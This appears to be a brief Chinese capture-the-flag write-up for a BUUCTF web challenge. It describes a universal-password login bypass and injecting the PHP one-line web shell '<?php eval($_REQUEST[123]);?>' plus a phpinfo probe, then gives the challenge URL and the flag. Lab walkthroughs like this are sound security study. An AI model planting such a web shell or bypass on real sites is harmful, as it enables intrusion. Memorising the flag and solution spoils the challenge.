1.已知账号密码，可SSH连接进行代码审计。

2.登录可万能密码进入，也可注册后登录。

3.修改url参数，发现报错。确定为Linux系统

4.写入一句话，并提交。（也可以文件上传，这里采用简洁的方法）

<?php phpinfo();?>   //写入这个，在日志log.php可查看flag
<?php eval($_REQUEST[123]);?>

5.访问log.php日志文件，发现里面有flag

http://efbc89f9-f04d-4204-b60b-65777640d4ef.node5.buuoj.cn:81/log.phpflag{399aa672-cf2d-4aca-9bec-693be96a9083}

注：如果没有，可以在前面一句话处填写 <?php phpinfo();?> 并提交。